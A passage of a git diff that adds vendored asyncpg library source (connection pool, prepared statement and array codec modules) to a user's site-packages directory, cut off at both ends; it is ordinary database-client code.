expire. Use :meth:`Pool.expire_connections() + ` to expedite the connection + expiry. + + :param str dsn: + Connection arguments specified using as a single string in + the following format: + ``postgres://user:pass@host:port/database?option=value``. + + :param \*\*connect_kwargs: + Keyword arguments for the :func:`~asyncpg.connection.connect` + function. + + .. versionadded:: 0.16.0 + """ + + self._connect_args = [dsn] + self._connect_kwargs = connect_kwargs + + async def _get_new_connection(self): + con = await self._connect( + *self._connect_args, + loop=self._loop, + connection_class=self._connection_class, + record_class=self._record_class, + **self._connect_kwargs, + ) + if not isinstance(con, self._connection_class): + good = self._connection_class + good_n = f'{good.__module__}.{good.__name__}' + bad = type(con) + if bad.__module__ == "builtins": + bad_n = bad.__name__ + else: + bad_n = f'{bad.__module__}.{bad.__name__}' + raise exceptions.InterfaceError( + "expected pool connect callback to return an instance of " + f"'{good_n}', got " f"'{bad_n}'" + ) + + if self._init is not None: + try: + await self._init(con) + except (Exception, asyncio.CancelledError) as ex: + # If a user-defined `init` function fails, we don't + # know if the connection is safe for re-use, hence + # we close it. A new connection will be created + # when `acquire` is called again. + try: + # Use `close()` to close the connection gracefully. + # An exception in `init` isn't necessarily caused + # by an IO or a protocol error. close() will + # do the necessary cleanup via _release_on_close(). + await con.close() + finally: + raise ex + + return con + + async def execute( + self, + query: str, + *args, + timeout: Optional[float]=None, + ) -> str: + """Execute an SQL command (or commands). + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.execute() `. + + .. versionadded:: 0.10.0 + """ + async with self.acquire() as con: + return await con.execute(query, *args, timeout=timeout) + + async def executemany( + self, + command: str, + args, + *, + timeout: Optional[float]=None, + ): + """Execute an SQL *command* for each sequence of arguments in *args*. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.executemany() + `. + + .. versionadded:: 0.10.0 + """ + async with self.acquire() as con: + return await con.executemany(command, args, timeout=timeout) + + async def fetch( + self, + query, + *args, + timeout=None, + record_class=None + ) -> list: + """Run a query and return the results as a list of :class:`Record`. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.fetch() `. + + .. versionadded:: 0.10.0 + """ + async with self.acquire() as con: + return await con.fetch( + query, + *args, + timeout=timeout, + record_class=record_class + ) + + async def fetchval(self, query, *args, column=0, timeout=None): + """Run a query and return a value in the first row. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.fetchval() + `. + + .. versionadded:: 0.10.0 + """ + async with self.acquire() as con: + return await con.fetchval( + query, *args, column=column, timeout=timeout) + + async def fetchrow(self, query, *args, timeout=None, record_class=None): + """Run a query and return the first row. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.fetchrow() `. + + .. versionadded:: 0.10.0 + """ + async with self.acquire() as con: + return await con.fetchrow( + query, + *args, + timeout=timeout, + record_class=record_class + ) + + async def fetchmany(self, query, args, *, timeout=None, record_class=None): + """Run a query for each sequence of arguments in *args* + and return the results as a list of :class:`Record`. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.fetchmany() + `. + + .. versionadded:: 0.30.0 + """ + async with self.acquire() as con: + return await con.fetchmany( + query, args, timeout=timeout, record_class=record_class + ) + + async def copy_from_table( + self, + table_name, + *, + output, + columns=None, + schema_name=None, + timeout=None, + format=None, + oids=None, + delimiter=None, + null=None, + header=None, + quote=None, + escape=None, + force_quote=None, + encoding=None + ): + """Copy table contents to a file or file-like object. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.copy_from_table() + `. + + .. versionadded:: 0.24.0 + """ + async with self.acquire() as con: + return await con.copy_from_table( + table_name, + output=output, + columns=columns, + schema_name=schema_name, + timeout=timeout, + format=format, + oids=oids, + delimiter=delimiter, + null=null, + header=header, + quote=quote, + escape=escape, + force_quote=force_quote, + encoding=encoding + ) + + async def copy_from_query( + self, + query, + *args, + output, + timeout=None, + format=None, + oids=None, + delimiter=None, + null=None, + header=None, + quote=None, + escape=None, + force_quote=None, + encoding=None + ): + """Copy the results of a query to a file or file-like object. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.copy_from_query() + `. + + .. versionadded:: 0.24.0 + """ + async with self.acquire() as con: + return await con.copy_from_query( + query, + *args, + output=output, + timeout=timeout, + format=format, + oids=oids, + delimiter=delimiter, + null=null, + header=header, + quote=quote, + escape=escape, + force_quote=force_quote, + encoding=encoding + ) + + async def copy_to_table( + self, + table_name, + *, + source, + columns=None, + schema_name=None, + timeout=None, + format=None, + oids=None, + freeze=None, + delimiter=None, + null=None, + header=None, + quote=None, + escape=None, + force_quote=None, + force_not_null=None, + force_null=None, + encoding=None, + where=None + ): + """Copy data to the specified table. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.copy_to_table() + `. + + .. versionadded:: 0.24.0 + """ + async with self.acquire() as con: + return await con.copy_to_table( + table_name, + source=source, + columns=columns, + schema_name=schema_name, + timeout=timeout, + format=format, + oids=oids, + freeze=freeze, + delimiter=delimiter, + null=null, + header=header, + quote=quote, + escape=escape, + force_quote=force_quote, + force_not_null=force_not_null, + force_null=force_null, + encoding=encoding, + where=where + ) + + async def copy_records_to_table( + self, + table_name, + *, + records, + columns=None, + schema_name=None, + timeout=None, + where=None + ): + """Copy a list of records to the specified table using binary COPY. + + Pool performs this operation using one of its connections. Other than + that, it behaves identically to + :meth:`Connection.copy_records_to_table() + `. + + .. versionadded:: 0.24.0 + """ + async with self.acquire() as con: + return await con.copy_records_to_table( + table_name, + records=records, + columns=columns, + schema_name=schema_name, + timeout=timeout, + where=where + ) + + def acquire(self, *, timeout=None): + """Acquire a database connection from the pool. + + :param float timeout: A timeout for acquiring a Connection. + :return: An instance of :class:`~asyncpg.connection.Connection`. + + Can be used in an ``await`` expression or with an ``async with`` block. + + .. code-block:: python + + async with pool.acquire() as con: + await con.execute(...) + + Or: + + .. code-block:: python + + con = await pool.acquire() + try: + await con.execute(...) + finally: + await pool.release(con) + """ + return PoolAcquireContext(self, timeout) + + async def _acquire(self, timeout): + async def _acquire_impl(): + ch = await self._queue.get() # type: PoolConnectionHolder + try: + proxy = await ch.acquire() # type: PoolConnectionProxy + except (Exception, asyncio.CancelledError): + self._queue.put_nowait(ch) + raise + else: + # Record the timeout, as we will apply it by default + # in release(). + ch._timeout = timeout + return proxy + + if self._closing: + raise exceptions.InterfaceError('pool is closing') + self._check_init() + + if timeout is None: + return await _acquire_impl() + else: + return await compat.wait_for( + _acquire_impl(), timeout=timeout) + + async def release(self, connection, *, timeout=None): + """Release a database connection back to the pool. + + :param Connection connection: + A :class:`~asyncpg.connection.Connection` object to release. + :param float timeout: + A timeout for releasing the connection. If not specified, defaults + to the timeout provided in the corresponding call to the + :meth:`Pool.acquire() ` method. + + .. versionchanged:: 0.14.0 + Added the *timeout* parameter. + """ + if (type(connection) is not PoolConnectionProxy or + connection._holder._pool is not self): + raise exceptions.InterfaceError( + 'Pool.release() received invalid connection: ' + '{connection!r} is not a member of this pool'.format( + connection=connection)) + + if connection._con is None: + # Already released, do nothing. + return + + self._check_init() + + # Let the connection do its internal housekeeping when its released. + connection._con._on_release() + + ch = connection._holder + if timeout is None: + timeout = ch._timeout + + # Use asyncio.shield() to guarantee that task cancellation + # does not prevent the connection from being returned to the + # pool properly. + return await asyncio.shield(ch.release(timeout)) + + async def close(self): + """Attempt to gracefully close all connections in the pool. + + Wait until all pool connections are released, close them and + shut down the pool. If any error (including cancellation) occurs + in ``close()`` the pool will terminate by calling + :meth:`Pool.terminate() `. + + It is advisable to use :func:`python:asyncio.wait_for` to set + a timeout. + + .. versionchanged:: 0.16.0 + ``close()`` now waits until all pool connections are released + before closing them and the pool. Errors raised in ``close()`` + will cause immediate pool termination. + """ + if self._closed: + return + self._check_init() + + self._closing = True + + warning_callback = None + try: + warning_callback = self._loop.call_later( + 60, self._warn_on_long_close) + + release_coros = [ + ch.wait_until_released() for ch in self._holders] + await asyncio.gather(*release_coros) + + close_coros = [ + ch.close() for ch in self._holders] + await asyncio.gather(*close_coros) + + except (Exception, asyncio.CancelledError): + self.terminate() + raise + + finally: + if warning_callback is not None: + warning_callback.cancel() + self._closed = True + self._closing = False + + def _warn_on_long_close(self): + logger.warning('Pool.close() is taking over 60 seconds to complete. ' + 'Check if you have any unreleased connections left. ' + 'Use asyncio.wait_for() to set a timeout for ' + 'Pool.close().') + + def terminate(self): + """Terminate all connections in the pool.""" + if self._closed: + return + self._check_init() + for ch in self._holders: + ch.terminate() + self._closed = True + + async def expire_connections(self): + """Expire all currently open connections. + + Cause all currently open connections to get replaced on the + next :meth:`~asyncpg.pool.Pool.acquire()` call. + + .. versionadded:: 0.16.0 + """ + self._generation += 1 + + def _check_init(self): + if not self._initialized: + if self._initializing: + raise exceptions.InterfaceError( + 'pool is being initialized, but not yet ready: ' + 'likely there is a race between creating a pool and ' + 'using it') + raise exceptions.InterfaceError('pool is not initialized') + if self._closed: + raise exceptions.InterfaceError('pool is closed') + + def _drop_statement_cache(self): + # Drop statement cache for all connections in the pool. + for ch in self._holders: + if ch._con is not None: + ch._con._drop_local_statement_cache() + + def _drop_type_cache(self): + # Drop type codec cache for all connections in the pool. + for ch in self._holders: + if ch._con is not None: + ch._con._drop_local_type_cache() + + def __await__(self): + return self._async__init__().__await__() + + async def __aenter__(self): + await self._async__init__() + return self + + async def __aexit__(self, *exc): + await self.close() + + +class PoolAcquireContext: + + __slots__ = ('timeout', 'connection', 'done', 'pool') + + def __init__(self, pool: Pool, timeout: Optional[float]) -> None: + self.pool = pool + self.timeout = timeout + self.connection = None + self.done = False + + async def __aenter__(self): + if self.connection is not None or self.done: + raise exceptions.InterfaceError('a connection is already acquired') + self.connection = await self.pool._acquire(self.timeout) + return self.connection + + async def __aexit__( + self, + exc_type: Optional[Type[BaseException]] = None, + exc_val: Optional[BaseException] = None, + exc_tb: Optional[TracebackType] = None, + ) -> None: + self.done = True + con = self.connection + self.connection = None + await self.pool.release(con) + + def __await__(self): + self.done = True + return self.pool._acquire(self.timeout).__await__() + + +def create_pool(dsn=None, *, + min_size=10, + max_size=10, + max_queries=50000, + max_inactive_connection_lifetime=300.0, + connect=None, + setup=None, + init=None, + reset=None, + loop=None, + connection_class=connection.Connection, + record_class=protocol.Record, + **connect_kwargs): + r"""Create a connection pool. + + Can be used either with an ``async with`` block: + + .. code-block:: python + + async with asyncpg.create_pool(user='postgres', + command_timeout=60) as pool: + await pool.fetch('SELECT 1') + + Or to perform multiple operations on a single connection: + + .. code-block:: python + + async with asyncpg.create_pool(user='postgres', + command_timeout=60) as pool: + async with pool.acquire() as con: + await con.execute(''' + CREATE TABLE names ( + id serial PRIMARY KEY, + name VARCHAR (255) NOT NULL) + ''') + await con.fetch('SELECT 1') + + Or directly with ``await`` (not recommended): + + .. code-block:: python + + pool = await asyncpg.create_pool(user='postgres', command_timeout=60) + con = await pool.acquire() + try: + await con.fetch('SELECT 1') + finally: + await pool.release(con) + + .. warning:: + Prepared statements and cursors returned by + :meth:`Connection.prepare() ` + and :meth:`Connection.cursor() ` + become invalid once the connection is released. Likewise, all + notification and log listeners are removed, and ``asyncpg`` will + issue a warning if there are any listener callbacks registered on a + connection that is being released to the pool. + + :param str dsn: + Connection arguments specified using as a single string in + the following format: + ``postgres://user:pass@host:port/database?option=value``. + + :param \*\*connect_kwargs: + Keyword arguments for the :func:`~asyncpg.connection.connect` + function. + + :param Connection connection_class: + The class to use for connections. Must be a subclass of + :class:`~asyncpg.connection.Connection`. + + :param type record_class: + If specified, the class to use for records returned by queries on + the connections in this pool. Must be a subclass of + :class:`~asyncpg.Record`. + + :param int min_size: + Number of connection the pool will be initialized with. + + :param int max_size: + Max number of connections in the pool. + + :param int max_queries: + Number of queries after a connection is closed and replaced + with a new connection. + + :param float max_inactive_connection_lifetime: + Number of seconds after which inactive connections in the + pool will be closed. Pass ``0`` to disable this mechanism. + + :param coroutine connect: + A coroutine that is called instead of + :func:`~asyncpg.connection.connect` whenever the pool needs to make a + new connection. Must return an instance of type specified by + *connection_class* or :class:`~asyncpg.connection.Connection` if + *connection_class* was not specified. + + :param coroutine setup: + A coroutine to prepare a connection right before it is returned + from :meth:`Pool.acquire()`. An example use + case would be to automatically set up notifications listeners for + all connections of a pool. + + :param coroutine init: + A coroutine to initialize a connection when it is created. + An example use case would be to setup type codecs with + :meth:`Connection.set_builtin_type_codec() <\ + asyncpg.connection.Connection.set_builtin_type_codec>` + or :meth:`Connection.set_type_codec() <\ + asyncpg.connection.Connection.set_type_codec>`. + + :param coroutine reset: + A coroutine to reset a connection before it is returned to the pool by + :meth:`Pool.release()`. The function is supposed + to reset any changes made to the database session so that the next + acquirer gets the connection in a well-defined state. + + The default implementation calls :meth:`Connection.reset() <\ + asyncpg.connection.Connection.reset>`, which runs the following:: + + SELECT pg_advisory_unlock_all(); + CLOSE ALL; + UNLISTEN *; + RESET ALL; + + The exact reset query is determined by detected server capabilities, + and a custom *reset* implementation can obtain the default query + by calling :meth:`Connection.get_reset_query() <\ + asyncpg.connection.Connection.get_reset_query>`. + + :param loop: + An asyncio event loop instance. If ``None``, the default + event loop will be used. + + :return: An instance of :class:`~asyncpg.pool.Pool`. + + .. versionchanged:: 0.10.0 + An :exc:`~asyncpg.exceptions.InterfaceError` will be raised on any + attempted operation on a released connection. + + .. versionchanged:: 0.13.0 + An :exc:`~asyncpg.exceptions.InterfaceError` will be raised on any + attempted operation on a prepared statement or a cursor created + on a connection that has been released to the pool. + + .. versionchanged:: 0.13.0 + An :exc:`~asyncpg.exceptions.InterfaceWarning` will be produced + if there are any active listeners (added via + :meth:`Connection.add_listener() + ` + or :meth:`Connection.add_log_listener() + `) present on the + connection at the moment of its release to the pool. + + .. versionchanged:: 0.22.0 + Added the *record_class* parameter. + + .. versionchanged:: 0.30.0 + Added the *connect* and *reset* parameters. + """ + return Pool( + dsn, + connection_class=connection_class, + record_class=record_class, + min_size=min_size, + max_size=max_size, + max_queries=max_queries, + loop=loop, + connect=connect, + setup=setup, + init=init, + reset=reset, + max_inactive_connection_lifetime=max_inactive_connection_lifetime, + **connect_kwargs, + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/prepared_stmt.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/prepared_stmt.py new file mode 100755 index 0000000..0c2d335 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/prepared_stmt.py @@ -0,0 +1,286 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import json +import typing + +from . import connresource +from . import cursor +from . import exceptions + + +class PreparedStatement(connresource.ConnectionResource): + """A representation of a prepared statement.""" + + __slots__ = ('_state', '_query', '_last_status') + + def __init__(self, connection, query, state): + super().__init__(connection) + self._state = state + self._query = query + state.attach() + self._last_status = None + + @connresource.guarded + def get_name(self) -> str: + """Return the name of this prepared statement. + + .. versionadded:: 0.25.0 + """ + return self._state.name + + @connresource.guarded + def get_query(self) -> str: + """Return the text of the query for this prepared statement. + + Example:: + + stmt = await connection.prepare('SELECT $1::int') + assert stmt.get_query() == "SELECT $1::int" + """ + return self._query + + @connresource.guarded + def get_statusmsg(self) -> str: + """Return the status of the executed command. + + Example:: + + stmt = await connection.prepare('CREATE TABLE mytab (a int)') + await stmt.fetch() + assert stmt.get_statusmsg() == "CREATE TABLE" + """ + if self._last_status is None: + return self._last_status + return self._last_status.decode() + + @connresource.guarded + def get_parameters(self): + """Return a description of statement parameters types. + + :return: A tuple of :class:`asyncpg.types.Type`. + + Example:: + + stmt = await connection.prepare('SELECT ($1::int, $2::text)') + print(stmt.get_parameters()) + + # Will print: + # (Type(oid=23, name='int4', kind='scalar', schema='pg_catalog'), + # Type(oid=25, name='text', kind='scalar', schema='pg_catalog')) + """ + return self._state._get_parameters() + + @connresource.guarded + def get_attributes(self): + """Return a description of relation attributes (columns). + + :return: A tuple of :class:`asyncpg.types.Attribute`. + + Example:: + + st = await self.con.prepare(''' + SELECT typname, typnamespace FROM pg_type + ''') + print(st.get_attributes()) + + # Will print: + # (Attribute( + # name='typname', + # type=Type(oid=19, name='name', kind='scalar', + # schema='pg_catalog')), + # Attribute( + # name='typnamespace', + # type=Type(oid=26, name='oid', kind='scalar', + # schema='pg_catalog'))) + """ + return self._state._get_attributes() + + @connresource.guarded + def cursor(self, *args, prefetch=None, + timeout=None) -> cursor.CursorFactory: + """Return a *cursor factory* for the prepared statement. + + :param args: Query arguments. + :param int prefetch: The number of rows the *cursor iterator* + will prefetch (defaults to ``50``.) + :param float timeout: Optional timeout in seconds. + + :return: A :class:`~cursor.CursorFactory` object. + """ + return cursor.CursorFactory( + self._connection, + self._query, + self._state, + args, + prefetch, + timeout, + self._state.record_class, + ) + + @connresource.guarded + async def explain(self, *args, analyze=False): + """Return the execution plan of the statement. + + :param args: Query arguments. + :param analyze: If ``True``, the statement will be executed and + the run time statitics added to the return value. + + :return: An object representing the execution plan. This value + is actually a deserialized JSON output of the SQL + ``EXPLAIN`` command. + """ + query = 'EXPLAIN (FORMAT JSON, VERBOSE' + if analyze: + query += ', ANALYZE) ' + else: + query += ') ' + query += self._state.query + + if analyze: + # From PostgreSQL docs: + # Important: Keep in mind that the statement is actually + # executed when the ANALYZE option is used. Although EXPLAIN + # will discard any output that a SELECT would return, other + # side effects of the statement will happen as usual. If you + # wish to use EXPLAIN ANALYZE on an INSERT, UPDATE, DELETE, + # MERGE, CREATE TABLE AS, or EXECUTE statement without letting + # the command affect your data, use this approach: + # BEGIN; + # EXPLAIN ANALYZE ...; + # ROLLBACK; + tr = self._connection.transaction() + await tr.start() + try: + data = await self._connection.fetchval(query, *args) + finally: + await tr.rollback() + else: + data = await self._connection.fetchval(query, *args) + + return json.loads(data) + + @connresource.guarded + async def fetch(self, *args, timeout=None): + r"""Execute the statement and return a list of :class:`Record` objects. + + :param str query: Query text + :param args: Query arguments + :param float timeout: Optional timeout value in seconds. + + :return: A list of :class:`Record` instances. + """ + data = await self.__bind_execute(args, 0, timeout) + return data + + @connresource.guarded + async def fetchval(self, *args, column=0, timeout=None): + """Execute the statement and return a value in the first row. + + :param args: Query arguments. + :param int column: Numeric index within the record of the value to + return (defaults to 0). + :param float timeout: Optional timeout value in seconds. + If not specified, defaults to the value of + ``command_timeout`` argument to the ``Connection`` + instance constructor. + + :return: The value of the specified column of the first record. + """ + data = await self.__bind_execute(args, 1, timeout) + if not data: + return None + return data[0][column] + + @connresource.guarded + async def fetchrow(self, *args, timeout=None): + """Execute the statement and return the first row. + + :param str query: Query text + :param args: Query arguments + :param float timeout: Optional timeout value in seconds. + + :return: The first row as a :class:`Record` instance. + """ + data = await self.__bind_execute(args, 1, timeout) + if not data: + return None + return data[0] + + @connresource.guarded + async def fetchmany(self, args, *, timeout=None): + """Execute the statement and return a list of :class:`Record` objects. + + :param args: Query arguments. + :param float timeout: Optional timeout value in seconds. + + :return: A list of :class:`Record` instances. + + .. versionadded:: 0.30.0 + """ + return await self.__do_execute( + lambda protocol: protocol.bind_execute_many( + self._state, + args, + portal_name='', + timeout=timeout, + return_rows=True, + ) + ) + + @connresource.guarded + async def executemany(self, args, *, timeout: typing.Optional[float]=None): + """Execute the statement for each sequence of arguments in *args*. + + :param args: An iterable containing sequences of arguments. + :param float timeout: Optional timeout value in seconds. + :return None: This method discards the results of the operations. + + .. versionadded:: 0.22.0 + """ + return await self.__do_execute( + lambda protocol: protocol.bind_execute_many( + self._state, + args, + portal_name='', + timeout=timeout, + return_rows=False, + )) + + async def __do_execute(self, executor): + protocol = self._connection._protocol + try: + return await executor(protocol) + except exceptions.OutdatedSchemaCacheError: + await self._connection.reload_schema_state() + # We can not find all manually created prepared statements, so just + # drop known cached ones in the `self._connection`. + # Other manually created prepared statements will fail and + # invalidate themselves (unfortunately, clearing caches again). + self._state.mark_closed() + raise + + async def __bind_execute(self, args, limit, timeout): + data, status, _ = await self.__do_execute( + lambda protocol: protocol.bind_execute( + self._state, args, '', limit, True, timeout)) + self._last_status = status + return data + + def _check_open(self, meth_name): + if self._state.closed: + raise exceptions.InterfaceError( + 'cannot call PreparedStmt.{}(): ' + 'the prepared statement is closed'.format(meth_name)) + + def _check_conn_validity(self, meth_name): + self._check_open(meth_name) + super()._check_conn_validity(meth_name) + + def __del__(self): + self._state.detach() + self._connection._maybe_gc_stmt(self._state) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/__init__.py new file mode 100755 index 0000000..043454d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/__init__.py @@ -0,0 +1,12 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +# flake8: NOQA + +from __future__ import annotations + +from .protocol import Protocol, NO_TIMEOUT, BUILTIN_TYPE_NAME_MAP +from .record import Record diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/array.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/array.pyx new file mode 100755 index 0000000..f8f9b8d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/array.pyx @@ -0,0 +1,875 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from collections.abc import (Iterable as IterableABC, + Mapping as MappingABC, + Sized as SizedABC) + +from asyncpg import exceptions + + +DEF ARRAY_MAXDIM = 6 # defined in postgresql/src/includes/c.h + +# "NULL" +cdef Py_UCS4 *APG_NULL = [0x004E, 0x0055, 0x004C, 0x004C, 0x0000] + + +ctypedef object (*encode_func_ex)(ConnectionSettings settings, + WriteBuffer buf, + object obj, + const void *arg) + + +ctypedef object (*decode_func_ex)(ConnectionSettings settings, + FRBuffer *buf, + const void *arg) + + +cdef inline bint _is_trivial_container(object obj): + return cpython.PyUnicode_Check(obj) or cpython.PyBytes_Check(obj) or \ + cpythonx.PyByteArray_Check(obj) or cpythonx.PyMemoryView_Check(obj) + + +cdef inline _is_array_iterable(object obj): + return ( + isinstance(obj, IterableABC) and + isinstance(obj, SizedABC) and + not _is_trivial_container(obj) and + not isinstance(obj, MappingABC) + ) + + +cdef inline _is_sub_array_iterable(object obj): + # Sub-arrays have a specialized check, because we treat + # nested tuples as records. + return _is_array_iterable(obj) and not cpython.PyTuple_Check(obj) + + +cdef _get_array_shape(object obj, int32_t *dims, int32_t *ndims): + cdef: + ssize_t mylen = len(obj) + ssize_t elemlen = -2 + object it + + if mylen > _MAXINT32: + raise ValueError('too many elements in array value') + + if ndims[0] > ARRAY_MAXDIM: + raise ValueError( + 'number of array dimensions ({}) exceed the maximum expected ({})'. + format(ndims[0], ARRAY_MAXDIM)) + + dims[ndims[0] - 1] = mylen + + for elem in obj: + if _is_sub_array_iterable(elem): + if elemlen == -2: + elemlen = len(elem) + if elemlen > _MAXINT32: + raise ValueError('too many elements in array value') + ndims[0] += 1 + _get_array_shape(elem, dims, ndims) + else: + if len(elem) != elemlen: + raise ValueError('non-homogeneous array') + else: + if elemlen >= 0: + raise ValueError('non-homogeneous array') + else: + elemlen = -1 + + +cdef _write_array_data(ConnectionSettings settings, object obj, int32_t ndims, + int32_t dim, WriteBuffer elem_data, + encode_func_ex encoder, const void *encoder_arg): + if dim < ndims - 1: + for item in obj: + _write_array_data(settings, item, ndims, dim + 1, elem_data, + encoder, encoder_arg) + else: + for item in obj: + if item is None: + elem_data.write_int32(-1) + else: + try: + encoder(settings, elem_data, item, encoder_arg) + except TypeError as e: + raise ValueError( + 'invalid array element: {}'.format(e.args[0])) from None + + +cdef inline array_encode(ConnectionSettings settings, WriteBuffer buf, + object obj, uint32_t elem_oid, + encode_func_ex encoder, const void *encoder_arg): + cdef: + WriteBuffer elem_data + int32_t dims[ARRAY_MAXDIM] + int32_t ndims = 1 + int32_t i + + if not _is_array_iterable(obj): + raise TypeError( + 'a sized iterable container expected (got type {!r})'.format( + type(obj).__name__)) + + _get_array_shape(obj, dims, &ndims) + + elem_data = WriteBuffer.new() + + if ndims > 1: + _write_array_data(settings, obj, ndims, 0, elem_data, + encoder, encoder_arg) + else: + for i, item in enumerate(obj): + if item is None: + elem_data.write_int32(-1) + else: + try: + encoder(settings, elem_data, item, encoder_arg) + except TypeError as e: + raise ValueError( + 'invalid array element at index {}: {}'.format( + i, e.args[0])) from None + + buf.write_int32(12 + 8 * ndims + elem_data.len()) + # Number of dimensions + buf.write_int32(ndims) + # flags + buf.write_int32(0) + # element type + buf.write_int32(elem_oid) + # upper / lower bounds + for i in range(ndims): + buf.write_int32(dims[i]) + buf.write_int32(1) + # element data + buf.write_buffer(elem_data) + + +cdef _write_textarray_data(ConnectionSettings settings, object obj, + int32_t ndims, int32_t dim, WriteBuffer array_data, + encode_func_ex encoder, const void *encoder_arg, + Py_UCS4 typdelim): + cdef: + ssize_t i = 0 + int8_t delim = typdelim + WriteBuffer elem_data + Py_buffer pybuf + const char *elem_str + char ch + ssize_t elem_len + ssize_t quoted_elem_len + bint need_quoting + + array_data.write_byte(b'{') + + if dim < ndims - 1: + for item in obj: + if i > 0: + array_data.write_byte(delim) + array_data.write_byte(b' ') + _write_textarray_data(settings, item, ndims, dim + 1, array_data, + encoder, encoder_arg, typdelim) + i += 1 + else: + for item in obj: + elem_data = WriteBuffer.new() + + if i > 0: + array_data.write_byte(delim) + array_data.write_byte(b' ') + + if item is None: + array_data.write_bytes(b'NULL') + i += 1 + continue + else: + try: + encoder(settings, elem_data, item, encoder_arg) + except TypeError as e: + raise ValueError( + 'invalid array element: {}'.format( + e.args[0])) from None + + # element string length (first four bytes are the encoded length.) + elem_len = elem_data.len() - 4 + + if elem_len == 0: + # Empty string + array_data.write_bytes(b'""') + else: + cpython.PyObject_GetBuffer( + elem_data, &pybuf, cpython.PyBUF_SIMPLE) + + elem_str = (pybuf.buf) + 4 + + try: + if not apg_strcasecmp_char(elem_str, b'NULL'): + array_data.write_byte(b'"') + array_data.write_cstr(elem_str, 4) + array_data.write_byte(b'"') + else: + quoted_elem_len = elem_len + need_quoting = False + + for i in range(elem_len): + ch = elem_str[i] + if ch == b'"' or ch == b'\\': + # Quotes and backslashes need escaping. + quoted_elem_len += 1 + need_quoting = True + elif (ch == b'{' or ch == b'}' or ch == delim or + apg_ascii_isspace(ch)): + need_quoting = True + + if need_quoting: + array_data.write_byte(b'"') + + if quoted_elem_len == elem_len: + array_data.write_cstr(elem_str, elem_len) + else: + # Escaping required. + for i in range(elem_len): + ch = elem_str[i] + if ch == b'"' or ch == b'\\': + array_data.write_byte(b'\\') + array_data.write_byte(ch) + + array_data.write_byte(b'"') + else: + array_data.write_cstr(elem_str, elem_len) + finally: + cpython.PyBuffer_Release(&pybuf) + + i += 1 + + array_data.write_byte(b'}') + + +cdef inline textarray_encode(ConnectionSettings settings, WriteBuffer buf, + object obj, encode_func_ex encoder, + const void *encoder_arg, Py_UCS4 typdelim): + cdef: + WriteBuffer array_data + int32_t dims[ARRAY_MAXDIM] + int32_t ndims = 1 + int32_t i + + if not _is_array_iterable(obj): + raise TypeError( + 'a sized iterable container expected (got type {!r})'.format( + type(obj).__name__)) + + _get_array_shape(obj, dims, &ndims) + + array_data = WriteBuffer.new() + _write_textarray_data(settings, obj, ndims, 0, array_data, + encoder, encoder_arg, typdelim) + buf.write_int32(array_data.len()) + buf.write_buffer(array_data) + + +cdef inline array_decode(ConnectionSettings settings, FRBuffer *buf, + decode_func_ex decoder, const void *decoder_arg): + cdef: + int32_t ndims = hton.unpack_int32(frb_read(buf, 4)) + int32_t flags = hton.unpack_int32(frb_read(buf, 4)) + uint32_t elem_oid = hton.unpack_int32(frb_read(buf, 4)) + list result + int i + int32_t elem_len + int32_t elem_count = 1 + FRBuffer elem_buf + int32_t dims[ARRAY_MAXDIM] + Codec elem_codec + + if ndims == 0: + return [] + + if ndims > ARRAY_MAXDIM: + raise exceptions.ProtocolError( + 'number of array dimensions ({}) exceed the maximum expected ({})'. + format(ndims, ARRAY_MAXDIM)) + elif ndims < 0: + raise exceptions.ProtocolError( + 'unexpected array dimensions value: {}'.format(ndims)) + + for i in range(ndims): + dims[i] = hton.unpack_int32(frb_read(buf, 4)) + if dims[i] < 0: + raise exceptions.ProtocolError( + 'unexpected array dimension size: {}'.format(dims[i])) + # Ignore the lower bound information + frb_read(buf, 4) + + if ndims == 1: + # Fast path for flat arrays + elem_count = dims[0] + result = cpython.PyList_New(elem_count) + + for i in range(elem_count): + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len == -1: + elem = None + else: + frb_slice_from(&elem_buf, buf, elem_len) + elem = decoder(settings, &elem_buf, decoder_arg) + + cpython.Py_INCREF(elem) + cpython.PyList_SET_ITEM(result, i, elem) + + else: + result = _nested_array_decode(settings, buf, + decoder, decoder_arg, ndims, dims, + &elem_buf) + + return result + + +cdef _nested_array_decode(ConnectionSettings settings, + FRBuffer *buf, + decode_func_ex decoder, + const void *decoder_arg, + int32_t ndims, int32_t *dims, + FRBuffer *elem_buf): + + cdef: + int32_t elem_len + int64_t i, j + int64_t array_len = 1 + object elem, stride + # An array of pointers to lists for each current array level. + void *strides[ARRAY_MAXDIM] + # An array of current positions at each array level. + int32_t 